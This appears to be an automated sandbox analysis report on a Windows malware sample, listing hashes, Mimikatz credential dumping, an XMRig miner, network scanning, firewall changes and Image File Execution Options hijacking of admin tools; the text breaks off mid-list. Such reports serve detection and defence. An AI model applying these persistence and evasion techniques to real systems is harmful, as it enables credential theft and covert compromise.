Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2024 05:49
Behavioral task
behavioral1
Sample
2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe
Resource
win10v2004-20240802-en
General
-
Target
2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe
-
Size
8.3MB
-
MD5
62a24423241a8c4fc882ff366ec0fa30
-
SHA1
618eabb9e8ce2bfbf7afff676ff53e4c8973ce09
-
SHA256
2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8
-
SHA512
8e7bb38dd53104ea2fa6a41ac0bdd4e0c5b9fa522b5aef4d37935ce295fe6184eef78a1c86c4e9ed428a83ee958809e575e194872a90d73fc37c87b99b5e7a2b
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
iacqttm.exedescription pid Process procid_target PID 3976 created 2132 3976 iacqttm.exe 38 -
Contacts a large (4642) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 7 IoCs
Processes:
resource yara_rule behavioral2/memory/920-178-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp xmrig behavioral2/memory/920-183-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp xmrig behavioral2/memory/920-203-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp xmrig behavioral2/memory/920-212-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp xmrig behavioral2/memory/920-221-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp xmrig behavioral2/memory/920-234-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp xmrig behavioral2/memory/920-249-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/5100-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/5100-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x00080000000234db-6.dat mimikatz behavioral2/memory/3116-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/316-138-0x00007FF7DCE30000-0x00007FF7DCF1E000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
Processes:
iacqttm.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts iacqttm.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
iacqttm.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe iacqttm.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 3520 netsh.exe 1060 netsh.exe -
Executes dropped EXE 28 IoCs
Processes:
iacqttm.exeiacqttm.exewpcap.exeevlwailif.exevfshost.exestiattrir.exexohudmc.exexcllcg.exerqwpbp.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exestiattrir.exeiacqttm.exestiattrir.exedbqlbfrvt.exepid Process 3116 iacqttm.exe 3976 iacqttm.exe 2244 wpcap.exe 4344 evlwailif.exe 316 vfshost.exe 1940 stiattrir.exe 2812 xohudmc.exe 4536 xcllcg.exe 920 rqwpbp.exe 4004 stiattrir.exe 3688 stiattrir.exe 3332 stiattrir.exe 1968 stiattrir.exe 3548 stiattrir.exe 4076 stiattrir.exe 1608 stiattrir.exe 4576 stiattrir.exe 5064 stiattrir.exe 2452 stiattrir.exe 1852 stiattrir.exe 4292 stiattrir.exe 1488 stiattrir.exe 868 stiattrir.exe 1340 stiattrir.exe 4656 stiattrir.exe 4652 iacqttm.exe 3624 stiattrir.exe 2976 dbqlbfrvt.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exeevlwailif.exepid Process 2244 wpcap.exe 2244 wpcap.exe 2244 wpcap.exe 2244 wpcap.exe 2244 wpcap.exe 2244 wpcap.exe 2244 wpcap.exe 2244 wpcap.exe 2244 wpcap.exe 4344 evlwailif.exe 4344 evlwailif.exe 4344 evlwailif.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 76 ifconfig.me 77 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
wpcap.exeiacqttm.exexohudmc.exedescription ioc Process File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData iacqttm.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF iacqttm.exe File opened for modification C:\Windows\SysWOW64\xcllcg.exe xohudmc.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF iacqttm.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\xcllcg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft iacqttm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 iacqttm.exe File created C:\Windows\system32\wpcap.dll wpcap.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023531-134.dat upx behavioral2/memory/316-136-0x00007FF7DCE30000-0x00007FF7DCF1E000-memory.dmp upx behavioral2/memory/316-138-0x00007FF7DCE30000-0x00007FF7DCF1E000-memory.dmp upx behavioral2/files/0x000700000002353c-141.dat upx behavioral2/memory/1940-142-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/1940-150-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/files/0x0007000000023539-164.dat upx behavioral2/memory/920-165-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp upx behavioral2/memory/4004-171-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/3688-175-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/920-178-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp upx behavioral2/memory/3332-180-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/920-183-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp upx behavioral2/memory/1968-185-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/3548-189-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/4076-193-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/1608-197-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/4576-201-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/920-203-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp upx behavioral2/memory/5064-206-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/2452-210-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/920-212-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp upx behavioral2/memory/1852-215-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/4292-219-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/920-221-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp upx behavioral2/memory/1488-224-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/868-228-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/1340-231-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/4656-233-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/920-234-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp upx behavioral2/memory/3624-238-0x00007FF60BD30000-0x00007FF60BD8B000-memory.dmp upx behavioral2/memory/920-249-0x00007FF6063A0000-0x00007FF6064C0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
iacqttm.execmd.exe2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exedbqlbfrvt.exedescription ioc Process File created C:\Windows\baerflpsi\UnattendGC\specials\docmicfg.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\cnli-1.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\coli-0.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\vimpcsvc.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\vimpcsvc.xml iacqttm.exe File created C:\Windows\baerflpsi\ngfqdelbf\dbqlbfrvt.exe iacqttm.exe File opened for modification C:\Windows\ctnikqfc\svschost.xml iacqttm.exe File created C:\Windows\baerflpsi\upbdrjv\swrpwe.exe iacqttm.exe File opened for modification C:\Windows\baerflpsi\Corporate\log.txt cmd.exe File created C:\Windows\baerflpsi\ngfqdelbf\evlwailif.exe iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\exma-1.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\docmicfg.xml iacqttm.exe File opened for modification C:\Windows\ctnikqfc\vimpcsvc.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\spoolsrv.xml iacqttm.exe File created C:\Windows\ctnikqfc\spoolsrv.xml iacqttm.exe File created C:\Windows\baerflpsi\ngfqdelbf\ip.txt iacqttm.exe File created C:\Windows\baerflpsi\ngfqdelbf\scan.bat iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\libxml2.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\vimpcsvc.exe iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\docmicfg.exe iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\schoedcl.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\posh-0.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\svschost.xml iacqttm.exe File created C:\Windows\ctnikqfc\svschost.xml iacqttm.exe File opened for modification C:\Windows\ctnikqfc\iacqttm.exe 2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe File created C:\Windows\baerflpsi\UnattendGC\specials\trch-1.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\trfo-2.dll iacqttm.exe File created C:\Windows\ime\iacqttm.exe iacqttm.exe File opened for modification C:\Windows\baerflpsi\ngfqdelbf\Result.txt dbqlbfrvt.exe File created C:\Windows\ctnikqfc\iacqttm.exe 2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exe File created C:\Windows\baerflpsi\ngfqdelbf\wpcap.exe iacqttm.exe File created C:\Windows\baerflpsi\ngfqdelbf\wpcap.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\ucl.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\AppCapture64.dll iacqttm.exe File created C:\Windows\baerflpsi\Corporate\vfshost.exe iacqttm.exe File created C:\Windows\baerflpsi\Corporate\mimilib.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\svschost.exe iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\schoedcl.exe iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\svschost.xml iacqttm.exe File opened for modification C:\Windows\ctnikqfc\schoedcl.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\ssleay32.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\spoolsrv.xml iacqttm.exe File created C:\Windows\ctnikqfc\docmicfg.xml iacqttm.exe File created C:\Windows\baerflpsi\ngfqdelbf\Packet.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\crli-0.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\tucl-1.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\spoolsrv.exe iacqttm.exe File opened for modification C:\Windows\baerflpsi\ngfqdelbf\Packet.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\tibe-2.dll iacqttm.exe File opened for modification C:\Windows\ctnikqfc\docmicfg.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\Shellcode.ini iacqttm.exe File created C:\Windows\ctnikqfc\schoedcl.xml iacqttm.exe File opened for modification C:\Windows\ctnikqfc\spoolsrv.xml iacqttm.exe File created C:\Windows\baerflpsi\Corporate\mimidrv.sys iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\libeay32.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\xdvl-0.dll iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\zlib1.dll iacqttm.exe File created C:\Windows\ctnikqfc\vimpcsvc.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\specials\schoedcl.xml iacqttm.exe File created C:\Windows\baerflpsi\UnattendGC\AppCapture32.dll iacqttm.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 3604 sc.exe 1876 sc.exe 4296 sc.exe 3692 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
netsh.exenet1.execmd.exenetsh.exeschtasks.execacls.execacls.execmd.exenet.execmd.exenet1.exenetsh.exenet1.exeiacqttm.execmd.exenet1.exeevlwailif.execmd.exenetsh.execmd.execmd.exe2365ffb87d643fcdca1434bb291c2ef0cf54b3e6b4313788140edb0515df06f8N.exeiacqttm.execmd.execmd.exenetsh.exewpcap.exenetsh.execmd.exePING.EXEnet.execmd.execmd.exexohudmc.exenet.exenet1.exenetsh.execmd.exenet1.exenet1.execmd.exesc.exenet1.execmd.exenetsh.execmd.execmd.exenet.exesc.execacls.exenet.exenetsh.exesc.execmd.exedbqlbfrvt.exenetsh.exenetsh.exenet1.exenet.execmd.exenet.execmd.execmd.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 